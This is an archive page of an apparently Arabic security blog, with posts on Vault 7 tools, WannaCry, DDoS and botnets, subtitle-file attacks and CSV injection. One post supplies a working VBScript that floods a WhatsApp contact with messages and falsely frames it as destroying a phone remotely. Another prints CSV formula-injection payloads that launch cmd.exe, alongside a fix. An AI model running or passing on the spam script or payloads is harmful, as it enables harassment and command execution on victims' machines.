حلقات احترافية
‏إظهار الرسائل ذات التسميات الحماية. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات الحماية. إظهار كافة الرسائل

27‏/06‏/2017

Brutal kangaroo أو الكنغر الوحشي هو تسريب جديد من تسريبات ويكيليكس المعروفة بعملية Vault 7 ، وهي أداة إختراق تستعملها وكالة المخابرات المركزية CIA لإختراق أجهزة الكمبيوتر .



سرب موقع ويكيليكس يوم الخميس الموافق لـ 22 يونيو الجاري أداة جديدة للتجسس تستعملها وكالة المخابرات المركزية CIA ، تدعى Brutal kangaroo أو الكنغر الوحشي وهي أداة تستعمل في إختراق شبكات الكمبيوتر المغلقة و أجهزة الكمبيوتر المعزولة بما يعرف بالإنجليزية ب Air Gapped Networks  و اللتي تعمل بنظام التشغيل ويندوز .
هذه النوعية من الشبكات تستعمل تقنية حماية جد عالية تتمثل في عزل جميع أجهزة الكمبيوتر اللتي تحتويها ماديا عن أي إتصال خارجي ، بمعنى أدق عن الإنترنت ، و إن تم تطبيق هذا النوع من الحماية في أي شبكة فسوف يكون من شبه المستحيل إختراقها و التجسس عليها .


👌كيف يعمل فيروس Brutal kangaroo ؟
يقوم فيروس Brutal kangaroo بإنشاء شبكة وهمية داخل الشبكة المعزولة Air Gapped Networks  ، ومن ثم يوفر الأجواء المناسبة للـ هاكر لتنفيذ العديد من الأوامر الخبيثة ، و فيما يلي طريقة عمل هذه الأداة :

1- يصيب الفيروس الجهاز الرئيسي Primary host المتصل بالإنترنت داخل المؤسسة .

2- عندما يقوم أحد مستعملي هذا الجهاز المصاب بإستعمال فلاش ديسك أو منفذ USB بصفة عامة ، ينتقل فيروس Brutal kangaroo إلى داخلها أيضا .

3- إذا تم إستعمال هذا الفلاش ديسك في أجهزة كمبيوتر الشبكة المعزولة Air Gapped Networks  ، فإن عدوى الإصابة ستنتقل بالكامل إلى كل الشبكة .



هكذا تتم عملية الإختراق و التجسس ، ولقد قال عنه الأخصائيون في مجال أمن المعلومات أنه يشبه فيروس Stuxnet المشهور .

👌واجهة برنامج إعداد فيروس Brutal kangaroo





و للتذكير فإن ويكيليكس أصدرت في 7 مارس 2017 الدفعة الأولى من وثائق وكالة المخابرات المركزية CIA ، وأنها وعدت بأنه ستكون أكبر حملة في العالم للكشف عن أدوات التجسس و الإختراق اللتي تستعملها الولايات المتحدة الأمريكية .
وتشمل هذه التسريبات أكثر من 8700 مستندات وملف و التي تم الاحتفاظ بها في شبكة داخلية معزولة من مركز للتجسس تابع لـ CIA واللذي يوجد مقره في مقر وكالة الاستخبارات في لانغلي بولاية فرجينيا .

الاختراق عن طريق الهواء و دون الاتصال بالانترنيت 😙 فيروس الكنغر الوحشي Brutal kangaroo

Brutal kangaroo أو الكنغر الوحشي  هو تسريب جديد من تسريبات ويكيليكس المعروفة بعملية Vault 7 ، وهي أداة إختراق تستعملها وكالة المخابرات ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

27‏/05‏/2017

القرصنة عبر الترجمة الموجودة في الأفلام هو آخر  شيء يمكن أن يتصوره العقل في مجال الإختراق ، ولكن هذا ما تم بالفعل ، فلقد تمكن فريق الحماية التابع لشركة checkpoint من إثبات عملية القرصنة عبر الترجمة في الأفلام و التي أصابت ملايين المستخدمين حول العالم .


كيف تتم القرصنة عبر الترجمة ؟
أكد الباحثون في شركة checkpoint أن ملايين الأشخاص حول العالم تعرضوا لعمليات الإختراق بينما كانوا يشاهدون بعض الأفلام أونلاين وكانوا قد فعلوا خاصية الترجمة فيها .
كما أكدوا أيضا أن مايقارب من 200 مليون مشغل فيديو يحمل في طياته هذا الفيروس الخبيث اللذي هو عبارة عن ملف ترجمة يقوم المستخدم بتحميله في قائمة الترجمة ، و ما إن ينتهي من تحميله و تشغيله ، يثبت هذا الفيروس نفسه و يقوم بالإتصال بجهاز الهاكر مباشرة ليمنحه صلاحيات كاملة للتحكم بالجهاز كيفما كان نوعه.


أشهر مشغلات الفيديو المصابة :
أكد موقع شركة checkpoint بأن أشهر مشغلات الفيديو المصابة بهذا الفيروس هي :

PopcornTime ==> يمكن تحميل النسخة اللتي وقع تحديثها عبر هذا الرابط :      هنـــا

Kodi ==> تم إصلاحها وهنا رابط التحميل الجديد :                                    هنـــا

VLC ==> تم أيضا إصلاحها و يمكنكم تنزيلها عبر موقعهم الرسمي :                   هنـــا

Stremio ==> وهذا رابط التحميل بالنسبة للنسخة الجديدة :                         هنـــا 
إليكم الشرح بالفيديو لطريقة القرصنة عبر الترجمة 

حذاري هام جدا!! كيف تتم القرصنة عبر الترجمة الموجودة في الأفلام (الشرح بالفيديو)

القرصنة عبر الترجمة الموجودة في الأفلام هو آخر  شيء يمكن أن يتصوره العقل في مجال الإختراق ، ولكن هذا ما تم بالفعل ، فلقد تمكن فريق الحماية...
في اقراء المزيد
هناك تعليق واحد:
التسميات: , ,

20‏/05‏/2017

اليوم تسريبات جديدة من ويكيليكس عن مشروع Athena/Hera v1.0 المبني لصالح #CIA من مجموعة تسريبات vault7 عن وكالة الـ  NSA
نظام او مشروع التجسس أثينا هو تطوير قوي يتعلق بمشروع Hera system للتجسس و اختراق انظمة التشغيل Windows تم تطوير المشروع بتعاون مع شركة Siege Technologies شركة مختصة بأمور الـ cyber security والحلول الامنية.
النظام بستهدف الانطمة الخاصة بـ Windows من XP لـ Win10 بلاصدارات التالية :
Windows XP Pro SP3 32-bit
Windows 7 32-bit/64-bit
Windows 8.1 32-bit/64-bit
Windows 2008 Enterprise Server
Windows 2012 Server
Windows 10.

تحليل اولي سريع عن مشروع Athena/Hera v1.0
يتكون نظام Athena من Builder و Tasker و Parser و Listening Post و Installer و RamOnly و OffLine
اول شيء بقوم الـ Builder الذي يشتغل على انطمة تشغيل Linux / Windows ومبرمج بلغة Python 3.4 على بناء حزم للاهداف المحددة حسب متطلبات الهدف الذي ينتج ملف بأسم Installer.dll لحتى يتم ارساله على جهاز الهدف لتنفيذ الاوامر علية وبعد تشغيل المثبت يقوم على تعديل سجل الهدف واسقاط ملف المضيف الافتراضي Iprcache.dll وملف ras.cache وبعدها تقوم اداة التنزيل على عمل Restart لـ Remote Access service "خدمة الوصول البعيد" وتقوم على تفعيل اربعة ملفات بامتداد AXE. الي هي "Host.dll" و "Engine.AXE" و"Command.AXE" و "Uninstall.AXE" وبعدها عملية الربط من خلال ارسال اشاره الى الـ LP الذي يعمل على معالجة الطلبات وارسال الاوامر من قبل المهاجم
ثاني شيء ألـ Tasker الذي يجهز الاوامر التي يتم ارسالها لـ الـ LP
ثالث شيء الـ Parser الذي يشتغل على نظام تشغيل Linux / Windows ومبرمج بلغة Python 3.4، يقوم على فك تشفير الـ responses التي ترجع من جهاز الهدف .
رابع شيء الـ Listening Post تم تصميم LP على خادم Apache (2.4) على نظام التشغيل Ubuntu v14.04. وايضا يستخدم لغة Python 3.4 ، مثل الواجهة التي  تتعامل مع الهدف المخترق والذي يرسل الاوامر و يعالج الطلبات وهو عبارة عن واجهة موقع بسيطة ليسهل عمل المهاجم .
خامس شيء الـ Installer يشتغل على Windows x86/x64 مبرمج بلغة ++C وضيفته بعد وصوله لجهاز الهدف يقوم بتثبيت الاداة على النظام المستهدف وهو عبارة عن DLL file.
سادس شيء الـ RamOnly تعمل على Windows x86/x64 ومبرمج بلغة ++C
تنفيذ النسخة غير المزودة بالاقراص زرع ملف DLL على النظام المستهدف
سابع شيء الـ Offline مبرمج بلغة Bash و++C وبيئة العمل Windows x86/x64 و Linux يقوم على تثبيت الاداة على النظام المستهدف الوصول الفعلى باستخدام التمهيد Windows Recovery Console او linux boot

WannaCry مجرد بداية تسريبات جديدة من حزمة vault7 عن وكالة الـ NSA لمشروع Athena/Hera v1.0

اليوم تسريبات جديدة من ويكيليكس عن مشروع Athena/Hera v1.0 المبني لصالح #CIA من مجموعة تسريبات vault7 عن وكالة الـ  NSA نظام او مشروع التجسس...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: , ,

13‏/05‏/2017

منذ ساعات وهجمة WannaCry التي ضربت العديد من الجهات من خلال Ransomware attack تصدرت الساحة الأمنية،   حيث يتم إستغلال هذه الخدمة على نطاق واسع وعلى شبكة الإنترنت من خلال ثغرة MS17-10 التي تم تسريبها من ضمن حزمة vault7 التي سُربت من الـ CIA ، تسمح هذه الثغرة للمُهاجم من إستغلال الأجهزة التي تعمل بنظام windows عن بعد ومن ثم تشغيل Ransomware على الأجهزة المُخترقة ومُطالبتها بفدية.




الفيروس مثله مثل اي فيروس فديه أخر يقوم بتشفير ملفات جهازك ويطلب منك مبلغ 300 دولار حتي يمكنك استرجاع ملفاتك مره اخري حيث بتم نشر هذا الفيروس من خلال رسائل تصيد Phishing EMails يتم ارسالها لملايين الإميلات بشكل عشوائي ويحتوي الإميل المرسل علي ملف مرفق عندما يتم فتحه يقوم بتنزل فيروس WannaCry وكذلك من الطرق التي يستخدمها الفيروس أيضا هي عملية الفحص العشوائي للعناوين IP Addresses فيقوم بانشاء ايبي عشوائي ومن ثم فحص اذا ما كان port 445 مفتوح علي هذا الايبي ام لا وهو البورت المستخدم بواسطة خدمة مشاركة ملفات SMB فاذا وجد ايبي مفتوح فيه هذا البورت يقوم بفحص جميع الايبيهات التي علي نفس الشبكه ويحاول استغلال ثغرة MS17-010 عليهم جميعا، اذا وجد اي جهاز علي الشبكه يستخدم خدمة مشاركة الملفات فانه يقوم بإستغلال هذه الثغرة الخطيرة MS17-010 التي تم الاعلان عنها عقب تسريبها من فريق الأمن القومي الأمريكي NSA بواسطة فريق ShadowBrokers او "وسطاء الظل
ثغرة MS17-010 ثغرة تصيب كل أنظمة الوندوز وتمكن المخترق من إختراق اي جهاز تعمل عليه خدمة مشاركة الملفات SMB .

إختُرِق حتى الآن 55,000 الف جهاز ومؤسسة في 74 دولة منها بريطانيا وروسيا والبرتغال والولايات المتحده واسبانيا والمانيا وأوربا. منها وزارة الصحة البريطانية إختراق 16 مستشفى والآلاف من الأنظمة التابعة لهم، ورئيسة الوزراء البريطانية و تم تشفير 1000 جهاز بشبكة وزارة الداخلية الروسية والأمن الفيدرالي FSB، و شركة MegaFon الروسية و VTB russian bank والسكك الحديدة الروسية، والخطوط الجوية الهندية Shaheen Airlines واختراق جامعات خاصة وشركة الإتصالات الأسبانية و مطار فرانكفورت، محطة قطارات فرانكفورت وTelefonica و FedEx us
وتعلن وزارة الداخلية الروسية حالة الطوارئ "تتعرض البلاد لهجمات الكترونية دولية كبرى".

الملفات الي بقوم بتشفيرها بتشمل تقريبا جميع الامتدادات واهمها :
.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot,
.stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der


Cryptography details - تفاصيل عن نوع التشفير
يستخدمون تشفير AES-128-CBC ليقوم بتشفير الـ data على اجهزة الضحايا حتى يمنعوا ويصعباو ويعقدوا عملية كشف مفتاح التشفير حيث قاموا بتشفير مفتاح الـ AES بخوارزمية التشفير AES key is encrypted by RSA-2048 ليأمنو عملية نقل المفاتيح وزيادة قوة مفتاح التشفير وجعل عملية تخمين المفتاح شبة مستحيلة

عنواين المهاجمين على الـ dark net
gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion

تفاصيل تقنيه عن طريقة عمل الفايروس والكود البرمجي الخاص به ونقاط الضعف التي بستغلها ومصدر الانتشار
نشرها موقع   ====>  malwarebytes


الحماية و التصدي لهذا الهجوم

- عمل تحديث لجميع أنظمة الويندوز لتتأكد من ترقيع ثغرة MS17-010 والتي هي السبب الرئيسي في عملية الإختراق وانتشار الفيروس
- قم بتحديث الانتي فيروس على جهازك
- لا تظغط على الاعلانات التي تظهر لديك في المواقع
- لا تظغط على الروابط التي تصلك عبر الامايل الآن
- لا تنزل ملفات من الانترنيت من مصادر مجهولة و كذالك برامج التورنت
- قم برفع ملفاتك على وحدات تخزين خارجية مثل (google drive ) أو غيرها من وحدات التخزين السحابي.
- حجب الإتصالات القادمة لخدمة الـ SMB التي تعمل على المنفذ 445 بشكل إفتراضي ،

احمي جهازك من هجمة WannaCry الذي اصابت العالم بأكمله قبل أن تسرق ملفاتك و يُطلَبُ منك فدية 300$

منذ ساعات وهجمة WannaCry التي ضربت العديد من الجهات من خلال Ransomware attack تصدرت الساحة الأمنية،   حيث يتم إستغلال هذه الخدمة على نطاق ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

27‏/04‏/2017


مرحبا بكم أعزاءي في درسنا اليوم والذي سنقوم فيه بشرح  تطبيق جديد و أكثر من رائع اسمه  private me

هذا التطبيق يمكنك من أن تحصل على هاتف ثاني داخل هاتفك و بمساحة أخرى وهمية حيث يمكنك تثبيت تطبيقات ثانية ووضع صورك الخاصة على هذا الهاتف ولن يستطيع أي شخص آخر أن يدخل إليه لأنه سيكون مختفيا و يستحيل على أي شخص أن يكتشفه و يدخل إليه..
هذا التطبيق حق أبهرني جدا جدا و أعتبره أفضل تطبيق جربته بحكم أنه ساعدني كثيرا ويستحق أن تقوم بتثبيته.




إذن سأترككم مع الشرح فرجة ممتعة





  
من بلاي ستور رابط تحميل التطبيق :  private me
رابط تحميل التطبيق خارج بلاي ستور private me

أفضل تطبيق شرحته للآن أقسم أنك ستقوم بتحميله

مرحبا بكم أعزاءي في درسنا اليوم والذي سنقوم فيه بشرح   تطبيق جديد و أكثر من رائع اسمه   private me هذا التطبيق يمكنك من أن تحصل على ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

06‏/02‏/2017

سبق و تطرقنا إلى شرح هجمات الحرمان من الخدمة  التي تستهذف السيرفورات و تقوم بتدميرهم وذكرنا المواقع التي تم تعطيلها بسبب هذه الهجمة مثل Twitter, GitHub, PayPal Amazon,soundcloud , Reddit, Netflix, Spotify. و كما نعلم فأن هذه المواقع تعتبر من أكبر المواقع على الأنترنيت و تم تعطيلها بسبب هجمة  DOS أو الحرمان من الخدمة.
إذن في درسنا اليوم و الذي هو درس حصري سنتطرق إلى شرح هذه الهجمة لكن ليس على السيرفورات و إنما هذه المرة على الهواتف و كيف يمكن لأي متطفل القضاء على هاتفك فقط بمعرفة رقمك الخاص .



إذن أحبتي في الله كي أطيل عليكم سأترككم مع الشرح بالفيديو كيف يتم تدمير أي هاتف  عن بعد عبر هجمة DOS 
فرجة ممتعة
رابط شرح هجمات DOS بالتفصيل
 السكريبت 
----------------------------------------------------------------------------------------------

' InputBoxes
Contact = InputBox("With which contact do you want to make DDos?", "WhatsApp DDos By Qaiboub")
Message = InputBox("What is the message to send?","WhatsApp DDos By Qaiboub")
T = InputBox("How many times does the message need to be sent?","WhatsApp DDos By Qaiboub")
If MsgBox("Você preencheu tudo corretamente", 1024 + vbSystemModal, "WhatsApp DDos By Qaiboub") = vbOk Then

 ' Go To WhatsApp
Set WshShell = WScript.CreateObject("WScript.Shell")
Return = WshShell.Run("https://web.whatsapp.com/", 1)

 ' Loading Time

 If MsgBox("O WhatsApp Web está aberto?" & vbNewLine & vbNewLine & "Aperte Não para cancelar", vbYesNo + vbQuestion + vbSystemModal, "WhatsApp DDos By Qaiboub") = vbYes Then

 ' Go To The WhatsApp Search Bar
WScript.Sleep 50
WshShell.SendKeys "{TAB}"

 ' Go To The Contacts Chat
WScript.Sleep 50
WshShell.SendKeys Contact
WScript.Sleep 50
WshShell.SendKeys "{ENTER}"

 ' The Loop For The Messages
For i = 0 to T
WScript.Sleep 5
WshShell.SendKeys Message
WScript.Sleep 5
WshShell.SendKeys "{ENTER}"
Next

 ' End Of The Script
WScript.Sleep 3000
MsgBox "DDosing no " + Contact + " foi feito com sucesso", 1024 + vbSystemModal, "DDos feito"

 ' Canceled Script
Else
MsgBox "O processo foi cancelado com sucesso", vbSystemModal, "DDos Cancelado"
End If
Else

End If

----------------------------------------------------------------------------------------------

كيف يتم تدمير أي هاتف عن بعد عبر هجمة DOS (احمي هاتفك)

سبق و تطرقنا إلى شرح هجمات الحرمان من الخدمة   التي تستهذف السيرفورات و تقوم بتدميرهم وذكرنا المواقع التي تم تعطيلها بسبب هذه الهجمة مثل  ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

19‏/11‏/2016

اليوم أحبتي في الله جئنا لكم بموقع جد رائع هذا الموقع يقوم  بمعرفة قوه كلمة المورور الخاصة بك ( الباسورد ) سواء كان باسورد الامايل أو حساب فيسبوك  أوغيرها ويعطيك كم من الوقت الذي قد يستغرقه الهكر للوصولإلى الباسورد الخاص بيك وهل يستطيع الوصول إليه او لا و إن وجد أنه ضعيف فهنا وجب عليك تغيره  ووضع باسورد أقوى .


الموقع :

معرفة هل يمكن للهكر اختراق و الوصول إلى الباسورد الخاص بك

اليوم أحبتي في الله جئنا لكم بموقع جد رائع هذا الموقع يقوم  بمعرفة قوه كلمة المورور الخاصة بك ( الباسورد ) سواء كان باسورد الامايل أو حساب ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات:

25‏/10‏/2016

أكيد أنكم سمعتم عن الهجوم الذي شُنَّ مؤخرا على أكبر المواقع و الذي تسبب في تعطيل عدد كبير منها مثل Twitter, GitHub, PayPal Amazon,soundcloud , Reddit, Netflix, Spotify. حيث استهذف هذا الهجوم سيرفرات DNS الخاصه بشركه DynDns و قد  أشارت التقارير الاولية إلى إستخدام اجهزه IOT في الهجوم والتي وصلت لاكثر من 160 الف جهاز.
و لقد انتاب العديد من الأشخاص المهتمين بمجال المعلوميات و الغير المهتمين الفضول لمعرفة هذا الهجوم وكيف  تم، و ما هي الطرق الذي استخدمت، و لاحظنا أيضا تردد عبارتي DOS و DDOS في مواقع التواصل الاجتماعية بخصوص هذا الموضوع، لهذا في تدوينة اليوم سنتطرق إلي شرح هجمات الحرمان من الخدمات أو  هجمات حجب الخدمة كما يسميها البعض (DOS Attacks)، و هي الهجمات التي استخدمت في الهجوم الكارثي الذي وقع يوم أمس.

محتويات:

  1. تعريف هجوم الحرمان من الخدمة

  2. ماهو الفرق بين هجمات DOS وهجمات DDOS ؟

  3. ماهي شبكات  BOTNET ؟


1 - تعريف هجوم الحرمان من الخدمة
كلنا يعلم أنه لكل شيء في هذه الحياة حدود وتبقى مقدار قوته  محدوده مهما وصل من القوة، و هذا ما ينطبق أيضا في مجال امن المعلوميات، حيث أنه أي جهاز يتواجد على الأرض له حدود من الطاقة والسرعة لا يستطيع تجاوزها، و حتى مع تطور العلم والتكنولوجيا بالأخص، تبقى قوة المعالجات والحواسيب محدوده مهما بلغت من سرعة، وتبقى أيضا كمية البيانات التي تعالجها محدوده، مهما بلغت هذه البيانات من ضخامه، فالحواسيب محدود بكمية معينة تستطيع معالجتها  فإن زادت هذه البيانات خارج طاقة هذه الحواسيب لا تستطيع تحملها وتنهار، و هذا هو مبدأ عمل هجمات الحرمان من الخدمة (DOS Attacks) بكافة أنواعها.
إذن بكل بساطة فمبدأ عمل هاته الهجمات هو اغراق الهدف ( الاجهزة المراد تدميرها ) بكمية ضخمة من الطلبات والبيانات حتى نصل إلى حجم أكبر من طاقة الهدف فينهار أو يخرج عن الخدمة وبهذا حققت هدفي واستطعت إيقاف ذلك الهدف من العمل أو حرمان من يستخدم ذلك الهدف من الاستفادة منه، ومن هذا المفهوم تم تسميتها هجمات الحرمان من الخدمة (Denial Of Service Attacks)، هذا النوع من الهجمات يُدعى في بعض الأوساط “بإيدز الإنترنت” بسبب انه ليس له علاج حتى الآن، فمهما بلغت مواصفات الهدف وسرعته وقدرته على معالجة واستقبال الطلبات يبقى ضمن رقم محدد من الطلبات مهما كان كبير و لا يستطيع أن يستقبل طلبات اكثر من ذلك العدد، فتبقى هذه الهجمات من أكثر الهجمات خطورة على شبكة الأنترنت و التي تهدد الدول والحكومات وكل الشبكات، لأنها في عرضة لتعرض هجمات الحرمان من الخدمة وانهيار شبكاتها وأجهرتها .  
هذه الهجمات تصنف الى قسمين :
1- (DOS = Denial of Service Attacks) هجمات الحرمان من الخدمة
2- (DDOS = Distributed Denial of Service Attacks) هجمات الحرمان من الخدمة الموزع

2- ماهو الفرق بين هجمات DOS وهجمات DDOS ؟

إذن نحن نعلم أنه عند تواجد الهكرز الغير الأخلاقيين فهناك هكرز أخلاقيين، أو المتخصصين في الأمن المعلوماتي والباحثين دائما عن حلول أمنية للتصدي لمثل هذه الهجمات، لهذا فنحن لن نقف مكتوفي الايدي لهذه الهجمات، إذن هذا ما وقع حيث ظهرت بعض الحمايات التي تصد من هجمات الحرمان من الخدمة، بحيث تعمل على وضع قواعد وسياسات بكمية معينة من الطلبات التي يمكن استلامها، على سبيل المثال يمكن أن يستلم الهدف 15 طلبات في الثانية الواحدة من المستخدم ، إذا زادت هذه الطلبات فأنه يتم تجاهلها ولا يتم قبلوها أو الانشغال بمعالجتها، لذلك لا يشكل هذا تأثير على الهدف ولا يمكنني من زيادة الطلبات عليه والتسبب في انهياره أو خروجه عن الخدمة، وقد يتم بشكل تلقائي حظر ذلك المهاجم الذي يحاول أن يرسل العديد من الطلبات والبيانات ولا يتم استلام منه أي طلبات اخرى. و بسبب مثل هذه الحمايات التي تحدد الطلبات وكميتها لا يمكن لأي شخص أن يرسل طلبات كثيره فسوف يتم حضره، وهنا يأتي ظهور مايسمي بشبكات البوت نت (BOTNET)  قبل أن نتحدث عن ماهي شبكات البوت نت ، دعوني أوضح كيف تعمل هذه الشبكات.
نحن متفقين على أن الهدف يملك حماية رائعة بسببها لم استطيع تنفيذ الهجوم وإرسال عدد كبير من الطلبات، لكن نعلم أن الهدف لا يقوم بتحديد كمية معينة من الطلبات الذي يستلمها بشكل طبيعي، بل يقوم بتحديد كمية معينة من الطلبات الذي يستلمها من طرف المستخدم الواحد، حيث يستلم عدد معين من الطلبات الذي يرسلها كل مستخدم، وأخدنا على سبيل المثال 15 طلبات في الثانية لكل مستخدم ، في هذه الحالة اذا كان لدينا 1000000 مستخدم يسمح لكل واحد منهم بـ 15 طلبات إذن العدد الكلي الذي سيستقبله الهذف يساوي تقريبا 15000000 طلب في الثانية هذا رقم مخيف جدا ولا يمكن لأي سيرفر تحمل هذا الكم من الطلبات في حالة كانت الطلبات من اجهزه تحمل خط انترنت سريع وتنقل باندويث عالي على السيرفر سوف ينهار في الفور، ولكن السؤال الآن كيف للمهاجم أن يحصل على 1000000 مستخدم ويستغلهم للهجوم ؟ لا تقلق سوف أوضح لك كيف يحصل المهاجم على هذا العدد من المستخدمين، وهنا يأتي هجوم DDOS الذي يقصد به استغلال كمية من الناس في مساعدتك في تنفيذ هجمات الحرمان من الخدمة وتنفيذ الهجوم على أي هدف تريد لا يوجد أي شيئ يمكنه إيقافك، لأنك في الواقع لم تقوم بأي شي غير شرعي على حسب قواعد الجدار الناري للسيرفر، تم تحديد 15 طلب و نحن لم نخرج عن القاعدة طلبنا 15 طلب فقط لكن الخدعة هي أن هناك 15 طلب من الألاف من المستخدمين .

3- ماهي شبكات  BOTNET ؟




هل تعلم أن دودة Santy التى أطلقت فى 20 ديسمبر 2004 قامت بتدمير أكثر من 40 ألف موقع فى أقل من 24 ساعة فقط .
هل تعلم أن ( دودة كونفيكر – 2008) أصيب بها نحو 15 مليون خادم من خوادم مايكروسوفت الأمر الذى دفع مايكروسوفت فى فبراير 2009 إلى الإعلان عن مكافأة بقيمة 250 ألف دولار لأى شخص يدلى بمعلومات عن مصممى هذه الدودة .
هل تعلم ان (دودة ILOVEYOU) اصابت 50 مليون جهاز في عام 2000 .
والعديد والعديد من الفايروسات القاتلة على شبكة الإنترنيت ، خاصة مع تطور أساليب الاختراق.

هل فكرت لماذا يتم صنع مثل هذه الفايروسات وماهو الغرض من هذا الانتشار المخيف، الأمر واضح قد يكون هناك فايروس له مهمة معينة مثل سرقة بعض البيانات او تنفيذ أمر معين يفيد صاحب الفايروس، او تروجان يصيب جهازك ويجعلك تحت رحمة صاحب التروجان او الدودة، إذن إذا قام بصنع دودة او فايروس وأصابت هذه الدودة 5000 جهاز سوف يكون تحت رحمة المهاجم 5000 جهاز يستخدمهم لهجمات الحرمان من الخدمة، على سبيل المثال لدينا الآن شبكة كبيره من الضحايا سوف اعطيهم امر من خلال البرنامج الذي أتحكم به بالفايروس واخبر الأجهزة جميعكم اطلبوا الموقع الفلاني الكثير من الطلبات . وبهذا حققنا الهجوم وتم تنفيذ هجموم الحرمان من الخدمة الموزع DDOS، الصورة في الأعلى توضح الهجوم.


شرح مفصل لهجمات الحرمان من الخدمة DOS/DDOS و الفرق بينهم و ماهي شبكات BOTNET ؟

أكيد أنكم سمعتم عن الهجوم الذي شُنَّ مؤخرا على أكبر المواقع و الذي  تسبب  في تعطيل  عدد كبير منها  مثل Twitter, GitHub, PayPal Amazon,sound...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

30‏/09‏/2016

⁠⁠⁠في هذه التدوينة أحبتي في الله سنتعرف على ثغرة من ثغرات تطبيقات الويب التي تم اكتشافها سنة 2014 من طرف شركة contexte و التي تسمي بــ CSV Injection  حيث في شرح اليوم سنتعرف على هذه الثغرة وسنتطرق الى  كيفية تفادي هذا النوع من الثغرات، الذي عادةً يتم استغلاله عن طريق حقن اكواد في forms، و التي تصدر بعد ذلك في هيئة ملف CSV.

 و يتم تشغيل الملف المصاب (ملف CSV) في برامج مخصصة لذلك، و من أشهرها هو Microsoft Excel، و في ذلك الوقت يتم تشغيل الحقن و تفعيل الكود.

 و بعد ذلك يتم استغلال الثغرة ضد من يقوم بتحميل الملف و تشغيله.يتم تجاهل هذا النوع من الثغرات كثيرا من المواقع و الشركات،و لاعتماد الهجوم الكاملعلى الضحية تشغيل الcommand المحقون. و لكن يجب معرفة ان هذه الثغرة و ان لم تكن خطيرة في البداية، فهي قد تؤدي الي Command Execution  علي الكمبيوتر المصاب.
يمكن  للمخترق من خلال هذه الثغرة وضع امر تنفيذي خاص مثلا بنظام تشغيل ويندوز كامر تشغيل الالة الحاسبة و يمكن ان يكون الامر مختلفأ كستغلال لثغرة عبر منصة ميتاسبلويت او غيرها , يمكن للضحية فتح ملف CSV و ان يتم استغلال جهازوا من خلال ملف بسيط لا يمكن لمستخدم بسيط ان يشك فية.
مثال على ذلك : 

 هناك العديد من الpayloads لشرح و برهنة وجود هذا النوع من الثغرات، و لكن اشهرها هو الآتي:


cmd|’ /C calc’!A0=

الـ payload المذكور أعلاه يقوم بإعلام البرنامج المُستخدم لتشغيل الملف المصاب بأنه يريد استخدام برنامج cmd.exe (علي أنظمة الويندوز)  وذلك باستخدام الامر  C calc/  ، و الذي سيقوم بدوره بتشغيل اﻵلة الحاسبة  (calc.exe) في أنظمة الويندوز. يمكن أيضا استغلال الثغرة عن طريق إضافة @، +، أو – في بداية الـ payload بدلاً من =، المثال التالي يوضح طريقة الاستغلال:
SUM(1+1)*cmd|’ /C calc’!A0@

 في المثال الثاني أعلاه يعمل الـ payload عن طريق استخدام دالة SUM، و التي تقوم بجمع القيم المعطاة لها، ثم تقوم بضرب الناتج في باقي الـ payload، و الذي هو أول payload شرحناه في هذا المقال.

 طبعا لن يكون هناك ناتج حسابي حقيقي في هذه الحالة، و لكن سوف يتم تشغيل الـ command المحقون .
حلول و طرق علاج الثغرة:

بدايةً يجب التأكد من أن كل مدخل يجب ان يكون في هيئة alpha-numeric، بمعني ان يكون المدخل إما حرف من حروف اللغة الإنجليزية أو رقم من 0 إلي 9، و ذلك عبر فلترة كل مدخل و التأكد من كل حرف.
كما هو الحال في طرق الحماية ضد معظم الثغرات، و علي الرغم من أننا فلترنا كل المدخلات، يجب عدم الثقة في أي مدخل من المستخدم و يجب encoding أي character قد لا يكون في هيئة alpha-numeric.

المشكلة في هذا النوع من الثغرات ليس في وجود @، +، -، أو = في بداية الـ payload، بل في وجود الـ | ، و الذي تعتبره معظم البرامج المستخدمة لتشغيل ملفات الCSV إشارة لتنفيذ أمر خارجي مثل cmd.exe أو powershell.exe. الحل الأمثل لهذه المشكلة يكمن في إضافة \ قبل ال |. فمثلا إذا كان الpayload الأصلي كالآتي:

cmd|’ /C calc’!A0=
يكون الpayload الناتج:

cmd\|’ /C calc’!A0=
و الذي سيمنع الpayload من التشغيل، و من ثم حماية المستخدم من هذا النوع من الثغرات.
يمكن توضيح هذه العملية من خلال كتابة كود python بسيط. يمكن رؤية الكود في الصورة التالية:



